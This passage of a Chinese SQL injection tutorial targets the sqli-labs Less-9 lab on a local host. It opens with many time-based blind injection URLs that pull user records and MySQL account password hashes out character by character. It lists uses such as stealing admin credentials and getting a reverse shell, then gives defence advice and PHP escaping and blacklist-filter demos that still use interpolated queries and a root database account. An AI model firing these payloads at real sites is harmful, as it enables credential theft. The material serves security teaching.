http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),8,1)) from security.users limit 0,1)=68,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),9,1)) from security.users limit 0,1)=117,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),10,1)) from security.users limit 0,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),11,1)) from security.users limit 0,1)=98,sleep(5),1)--+

4.6猜mysql user信息

猜一共有多少个用户

http://192.168.1.10:9999/Less-9/?id=1' and if((( select count(concat_ws('---',host,user,Password))from `mysql`.user) = 4),sleep(5),1) --+

猜获取的第二条用户数据的长度

http://192.168.1.10:9999/Less-9/?id=1' and if((( select length(concat_ws('-',host,user,Password))from `mysql`.user limit 1,1) = 18),sleep(5),1) --+

猜第二条用户数据每个字符的ascii码

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),1,1))from `mysql`.user limit 1,1) =98 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),2,1))from `mysql`.user limit 1,1) =99 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),3,1))from `mysql`.user limit 1,1) =53 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),4,1))from `mysql`.user limit 1,1) =51 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),5,1))from `mysql`.user limit 1,1) =101 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),6,1))from `mysql`.user limit 1,1) =54 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),7,1))from `mysql`.user limit 1,1) =102 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),8,1))from `mysql`.user limit 1,1) =48 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),9,1))from `mysql`.user limit 1,1) =52 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),10,1))from `mysql`.user limit 1,1) =101 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),11,1))from `mysql`.user limit 1,1) =97 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),12,1))from `mysql`.user limit 1,1) =102 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),13,1))from `mysql`.user limit 1,1) =45 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),14,1))from `mysql`.user limit 1,1) =114 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),15,1))from `mysql`.user limit 1,1) =111 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),16,1))from `mysql`.user limit 1,1) =111 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),17,1))from `mysql`.user limit 1,1) =116 ,sleep(5),1) --+

http://192.168.1.10:9999/Less-9/?id=1' and if( ( select ascii(mid(concat_ws('-',host,user,Password),18,1))from `mysql`.user limit 1,1) =45 ,sleep(5),1) --+

##将ascii码转换为对应字符即得到数据

5.SQL注入利用点

  • 绕过网页前端认证直接进入后台管理;
    • 获取数据库的数据,如网站的管理账号密码,用户注册信息;
    • 修改数据库的数据,篡改网页内容或者放置木马链接,添加修改管理员账户;
    • 读取系统文件,写入木马获取shell,删除系统文件导致系统崩溃;
    • 通过注入实现命令执行反弹shell

6.防御SQL注入

服务器层面:

  • 在服务器前端部署WAF、IPS、数据库审计,或使用云防护来防御

  • 服务器上可以安装软waf

  • web应用不用root用户连接数据库,使用能满足使用需求的最小权限的用户;

  • 关闭错误提示(PHP配置文件php.ini中的display_errors=Off)

  • 开启PHP的魔术配置,开启安全配置模式

    将safe_mode开启(on),关闭全局变量模式,即register_globals参数设置为off,并开启magic_quotes_gpc参数(注意:safe_mode、register_globals、magic_quotes_gpc这三项均已在PHP 5.4中移除,仅适用于旧版本PHP)


代码层面:

  • 参数化查询

引发SQL注入最根本原因之一是将SQL查询构建成字符串(动态字符串构造),然后提交给数据库执行。更安全的动态字符串构造方法是使用占位符或绑定变量来向SQL查询提供参数(而非直接对用户参数进行操作)。使用参数化查询可以避免很多常见的SQL注入问题,另外,由于数据库可以根据提供的预备语句来优化查询,使用参数化查询还能提高数据库查询的性能。

  • 输入验证

白名单

白名单验证只接收已经记录在案的良好输入的操作,在接收输入并进一步处理之前验证输入是否符合所期望的类型、长度或大小、数字范围或其他格式标准。

黑名单

黑名单验证机制只拒绝已记录在案的不良输入,通过检查浏览器提交的内容来查找是否存在已知的不良字符、字符串或模式。如果输入中包含众所周知的恶意内容,则会拒绝它。黑名单验证要比白名单弱,因为潜在的不良字符列表非常大,这会导致不良内容列表也很大,检索起来慢且不全,而且很难及时更新这些内容。

  • PHP使用PDO连接数据库

  • 使用正则过滤输入的字符串,对特殊字符进行转义、过滤、替换、删除

7.编写防御代码

7.1addslashes() 转义特殊字符

<html>
    <head>
        <title>回显注入</title>
    </head> 
    <body>
        <div style="text-align: center;margin: auto;" >
                <form action="sql_hx.php" method="get"> 
                输入用户ID:<input type="text" name="user_id"/>

                <input type="submit" value="查询" name="submit"/> 
            </form>
        </div>
        <?php 
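            if(isset($_REQUEST["submit"])){
                // 7.1: addslashes() demo. It backslash-escapes ' " \ and NUL so the
                // value cannot close the quoted literal in $sql below. Two caveats
                // for the reader: addslashes() knows nothing about the connection
                // charset (prefer $conn->real_escape_string() when escaping is
                // unavoidable), and escaping of any kind is weaker than the
                // parameterised query recommended in section 6.
                $raw_id = isset($_REQUEST["user_id"]) ? $_REQUEST["user_id"] : '';
                if (!is_string($raw_id)) $raw_id = '';   // user_id[]=x would arrive as an array
                $user_id = addslashes($raw_id);
                $sql = "select name,age from user where id = '$user_id';";

                $servername = "127.0.0.1";
                // NOTE(review): a root account contradicts the least-privilege advice
                // in section 6; give the web app its own account with SELECT only.
                $username = "root";
                $password = "root";
                $dbname = "test";

                // 创建连接
                $conn = new mysqli($servername, $username, $password, $dbname);
                // Check connection. The error text goes to the server log, not to the
                // browser (section 6: 关闭错误提示).
                if ($conn->connect_error) {
                    error_log("mysqli connect failed: " . $conn->connect_error);
                    die("连接失败");
                }

                $result = $conn->query($sql);

                // query() returns false on failure; reading ->num_rows from false is
                // a fatal error, so check before use.
                $found = false;
                if ($result === false) {
                    error_log("query failed: " . $conn->error);
                } else {
                    // 输出数据 -- every value is HTML-encoded on output: addslashes()
                    // protects the SQL literal only, not the HTML page.
                    while ($row = $result->fetch_assoc()) {
                        $found = true;
                        echo '<div style="text-align: center; border-style: solid; width: 40%;margin: auto;">';
                        echo "<p>" . htmlspecialchars($sql, ENT_QUOTES, 'UTF-8') . "</p>";
                        echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
                        echo "<p> name:" . htmlspecialchars((string) $row["name"], ENT_QUOTES, 'UTF-8') . "</p>";
                        echo "<p> age:" . htmlspecialchars((string) $row["age"], ENT_QUOTES, 'UTF-8') . "</p></div>";
                    }
                    $result->free();
                }
                if (!$found) {
                    echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
                    echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
                    echo "<p> 找不到该用户请重新输入</p></div>";
                }
                $conn->close();
            }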
        ?>  
    </body>
</html>

测试

直接输入单引号被转义

image-20210613114221170

将payload url编码也会被转义

image-20210613115243992

单引号16进制编码,不能正常运行

image-20210613115424133

7.2过滤字符串

添加一个过滤函数将含有攻击性的字符替换为空


<html>
    <head>
        <title>报错注入</title>
    </head> 
    <body>
        <div style="text-align: center;margin: auto;" >
                <form action="sql_bc.php" method="get"> 
                输入用户ID:<input type="text" name="user_id"/>

                <input type="submit" value="查询" name="submit"/> 
            </form>
        </div>
        <?php 
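        function filter($str)
        {
            // Blacklist sanitiser for the demo: strips characters and keywords that
            // typically appear in SQL injection payloads before $str is interpolated
            // into a query. Like every blacklist (see section 6) it is incomplete by
            // construction -- the robust fix is a parameterised query, or a whitelist
            // such as ctype_digit() for a numeric id. It is kept here to illustrate
            // the filtering approach only.
            //
            // @param mixed $str  raw request value
            // @return string|false  filtered string, or false when the value is
            //                       missing, empty or not a string (e.g. user_id[]=x)
            if (!is_string($str) || $str === '') return false;

            // Single characters that can close the quoted literal, terminate the
            // statement, open a comment or otherwise change query structure.
            // Never map a replacement *to* a quote character and never strip bare
            // digits: the former re-introduces the very character being filtered,
            // the latter breaks every legitimate id that contains that digit.
            $chars = array(
                "'", '"', '`', '\\', ';', ',', '(', ')', '{', '}', '/', '%', '$',
                '|', '&', '<', '>', '=', '*', '-', '+', '.', '#', '@', '!',
            );
            // Keywords are removed case-insensitively; a case-sensitive list lets
            // SELECT / Select through while catching only select.
            $words = array(
                'union', 'select', 'insert', 'update', 'delete', 'drop', 'create',
                'alter', 'rename', 'modify', 'join', 'where', 'like', 'convert',
                'char', 'md5', 'cas', 'or', 'eval', 'system', 'sysopen', 'open',
                'response', 'write', 'passwd', 'password', 'root', 'etc', 'script',
                'mailto:', 'array',
            );

            // Repeat until nothing changes: a single pass is defeated by nesting
            // (e.g. "selselectect" -> "select"). Each pass either shortens $str or
            // leaves it unchanged, so the loop terminates.
            // HTML encoding is deliberately *not* done here: this function guards the
            // SQL literal; the caller encodes for HTML at output time.
            do {
                $before = $str;
                $str = str_replace($chars, '', $str);
                $str = str_ireplace($words, '', $str);
            } while ($str !== $before);

            return $str;
        }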
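            if(isset($_REQUEST["submit"])){
                // filter() returns false for a missing/empty/non-string value; use an
                // empty id in that case instead of interpolating false as "".
                $user_id = filter(isset($_REQUEST["user_id"]) ? $_REQUEST["user_id"] : '');
                if ($user_id === false) $user_id = '';
                // Show the filtered value. It is HTML-encoded here because filter()
                // targets the SQL literal, not the HTML page.
                echo htmlspecialchars($user_id, ENT_QUOTES, 'UTF-8');
                $sql = "select name,age from user where id = '$user_id';";

                $servername = "127.0.0.1";
                // NOTE(review): a root account contradicts the least-privilege advice
                // in section 6; give the web app its own account with SELECT only.
                $username = "root";
                $password = "root";
                $dbname = "test";

                // 创建连接
                $conn = new mysqli($servername, $username, $password, $dbname);
                // Check connection. The error text goes to the server log, not to the
                // browser (section 6: 关闭错误提示).
                if ($conn->connect_error) {
                    error_log("mysqli connect failed: " . $conn->connect_error);
                    die("连接失败");
                }

                $result = $conn->query($sql);

                // query() returns false on failure; reading ->num_rows from false is
                // a fatal error, so check before use. The MySQL error message is
                // logged rather than echoed: echoing it is what makes error-based
                // injection readable from the browser.
                $found = false;
                if ($result === false) {
                    error_log("query failed: " . $conn->error);
                } else {
                    // 输出数据
                    while ($row = $result->fetch_assoc()) {
                        $found = true;
                        echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
                        echo "<p>" . htmlspecialchars($sql, ENT_QUOTES, 'UTF-8') . "</p>";
                        echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
                        echo "<p> name" . htmlspecialchars((string) $row["name"], ENT_QUOTES, 'UTF-8') . "</p>";
                        echo "<p> age " . htmlspecialchars((string) $row["age"], ENT_QUOTES, 'UTF-8') . "</p></div>";
                    }
                    $result->free();
                }
                if (!$found) {
                    echo '<div style="text-align: center; border-style: solid; width: 20%;margin: auto;">';
                    echo '<p style="font-weight: bold;font-size: large;">---user info---</p>';
                    echo htmlspecialchars($sql, ENT_QUOTES, 'UTF-8');
                    echo "<p> 找不到该用户请重新输入</p></div>";
                }
                $conn->close();
            }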
        ?>  
    </body>
</html>